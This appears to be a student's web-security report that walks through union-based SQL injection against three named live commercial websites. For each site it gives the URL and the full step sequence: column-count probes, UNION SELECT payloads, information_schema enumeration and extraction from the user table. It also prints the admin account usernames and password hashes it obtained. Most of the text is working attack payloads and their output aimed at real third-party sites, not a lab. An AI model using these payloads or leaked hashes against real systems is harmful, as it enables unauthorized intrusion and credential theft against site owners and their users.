21110098 – Võ Đăng Trình

Web security

1st website: mayinchuyennhiet.vn

[https://www.mayinchuyennhiet.vn/?php=product_detail&id=306]

1. SQL site search error

Judging by the link of the website “?php=product_detail&id=306”, we can spot that
this website can be affected by the SQL injection

2. Check the number of columns of the table that SQL query

Applying the hackbar V2 and the “order by 27--”

1
This is the website after applying those

3. Check for faulty columns which can be exploited

From the above run, we can say that the previous 21 pages can be exploited.
Applying the “+UNION SELECT
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 --” to find
out which page can be exploited

2
As can be seen from the website, page 16 is the one that can be used for exploiting the
information from the SQL

4. Check some database information

After spotting the page that can be used for the data extraction, change that page with
some keyword such as version() (check for the version of the database), database()
(check for database’s name), and user() (check for the user)
 Version()

3
As can be seen from the image, the version of the database is 5.7.37

 Database()

The name of the database is mayinchuye_binh

4
 User()

The user of this database is localhost

5. List tables in the database

To list all the names of the tables in the database, use
“unhex(hex(group_concat(table_name)))” and “from information_schema.tables
where table_schema=database()--”

5
After using those instructions, all the tables’ names of the database have been
extracted through page 16. All the tables’ names are:
tbl_config,tbl_content,tbl_content_category,tbl_product,tbl_product_category,tbl_prod
uct_hot,tbl_product_new,tbl_product_special,tbl_user,tbl_visitor

6. List columns in the database

To view the columns of the database, apply “https://www.mayinchuyennhiet.vn/?
php=product_detail&id=-306
+ UNION SELECT
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,unhex(hex(group_concat(column_name))),17,18,1
9,20,21,22,23,24,25,26 from information_schema.columns where
table_name=CHAR(116, 98, 108, 95, 117, 115, 101, 114)--”

6
So the columns of the database are id,uid,pwd,cat_id

7. Get data in the tables

Retrieving data from tables require the name of the columns:
“https://www.mayinchuyennhiet.vn/?php=product_detail&id=-306
+ UNION SELECT
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,unhex(hex(group_concat(id,0x02f,uid,0x02f,pwd,
0x02f,cat_id))),17,18,19,20,21,22,23,24,25,26 from tbl_user--”

7
The data in the table user is:
“1/admincp/0a4f59342d128ab612449a75ba121dc0/Admincp,2/coder/ee12026a0b34f0
78925edcb4d85680c8/Subadmin”
Inside this table, there are 2 accounts
+ User1: admincp, Password: 0a4f59342d128ab612449a75ba121dc0
+ User2: coder, Password: ee12026a0b34f078925edcb4d85680c8

8
2nd website: vietfarmsfsf.com
[http://www.vietfarmsfsf.com/?php=product_detail&id=260]

1. SQL site search error

Judging by the link of the website “?php=product_detail&id=260”, we can spot that
this website can be affected by the SQL injection

2. Check the number of columns of the table that SQL query

Applying the hackbar V2 and the “order by 19--”

9
This is the website after applying those

3. Check for faulty columns which can be exploited

From the above run, we can say that the previous 19 pages can be exploited.
Applying the “+UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 --” to
find out which page can be exploited

10
As can be seen from the website, page 8 is the one that can be used for exploiting the
information from the SQL

4. Check some database information

After spotting the page that can be used for the data extraction, change that page with
some keyword such as version() (check for the version of the database), database()
(check for database’s name), and user() (check for the user)
 Version()

11
As can be seen from the image, the version of the database is 5.0.67-community

 Database()

The name of the database is traiviets_demo

12
 user()

The user of this database is localhost

5. List tables in the database

To list all the names of the tables in the database, use
“unhex(hex(group_concat(table_name)))” and “from information_schema.tables
where table_schema=database()--”

13
After using those instructions, all the tables’ names of the database have been
extracted through page 8. All the tables’ names are:
tbl_config,tbl_content,tbl_content_category,tbl_product,tbl_product_category,tbl_prod
uct_new,tbl_product_special,tbl_user,tbl_visitor

6. List columns in the database

To view the columns of the database, apply “http://www.vietfarmsfsf.com/?
php=product_detail&id=- 260
+ UNION SELECT
1,2,3,4,5,6,7,unhex(hex(group_concat(column_name))),9,10,11,12,13,14,15,16,17,18
from information_schema.columns where table_name=CHAR(116, 98, 108, 95, 117,
115, 101, 114)--”

14
So the columns of the database are id,uid,pwd

7. Get data in the tables

Retrieving data from tables requires the name of the columns:
“http://www.vietfarmsfsf.com/?php=product_detail&id=- 260
+ UNION SELECT
1,2,3,4,5,6,7,unhex(hex(group_concat(id,0x02f,uid,0x02f,pwd))),9,10,11,12,13,14,15,
16,17,18 from tbl_user --”

15
The data in the table user is:
1/admincp/31b5d7b1a473763500b9b0d66e1a63c2,2/coder/ee12026a0b34f078925edc
b4d85680c8
Inside this table, there are 2 accounts:
+ User1: admincp, Password: 31b5d7b1a473763500b9b0d66e1a63c2
+ User2: coder, Password: ee12026a0b34f078925edcb4d85680c8

16
3rd website: thepdaitayduong.com.vn
[http://thepdaitayduong.com.vn/?php=product_detail&id=220]

1. SQL site search error

Judging by the link of the website “?php=product_detail&id=220”, we can spot that
this website can be affected by the SQL injection

2. Check the number of columns of the table that SQL query

Applying the hackbar V2 and the “order by 19--”

17
This is the website after applying that instruction

3. Check for faulty columns which can be exploited

From the above run, we can say that the previous 19 pages can be exploited.
Applying the “+UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 --” to
find out which page can be exploited

18
As can be seen from the website, page 6 is the one that can be used for exploiting the
information from the SQL

4. Check some database information

After spotting the page that can be used for the data extraction, change that page with
some keyword such as version() (check for the version of the database), database()
(check for database’s name), and user() (check for the user)
 Version()

19
As can be seen from the image, the version of the database is 5.7.37

 Database()

The name of the database is thepdaitay_binh

20
 user()

The user of this database is localhost

5. List tables in the database

To list all the names of the tables in the database, use
“unhex(hex(group_concat(table_name)))” and “from information_schema.tables
where table_schema=database()--”

21
After using those instructions, all the tables’ names of the database have been
extracted through page 6. All the tables’ names are:
tbl_config,tbl_content,tbl_content_category,tbl_product,tbl_product_category,tbl_prod
uct_new,tbl_product_special,tbl_user,tbl_visitor

6. List columns in the database

To view the columns of the database, apply “http://thepdaitayduong.com.vn/?
php=product_detail&id=- 220
+UNION SELECT
1,2,3,4,5,unhex(hex(group_concat(column_name))),7,8,9,10,11,12,13,14,15,16,17,18
from information_schema.columns where table_name=CHAR(116, 98, 108, 95, 117,
115, 101, 114)--”

22
So the columns of the database are id,uid,pwd,cat_id

7. Get data in the tables

Retrieving data from tables requires the name of the columns:
“http://thepdaitayduong.com.vn/?php=product_detail&id=- 220
+UNION SELECT
1,2,3,4,5,unhex(hex(group_concat(id,0x02f,uid,0x02f,pwd,0x02f,cat_id))),7,8,9,10,11
,12,13,14,15,16,17,18 from tbl_user --”

23
The data in the table user is:
1/admincp/0a4f59342d128ab612449a75ba121dc0/Admincp,2/coder/ee12026a0b34f0
78925edcb4d85680c8/Subadmin
Inside this table, there are 2 accounts:
+ User1: admincp, Password: 0a4f59342d128ab612449a75ba121dc0
+ User2: coder, Password: ee12026a0b34f078925edcb4d85680c8

24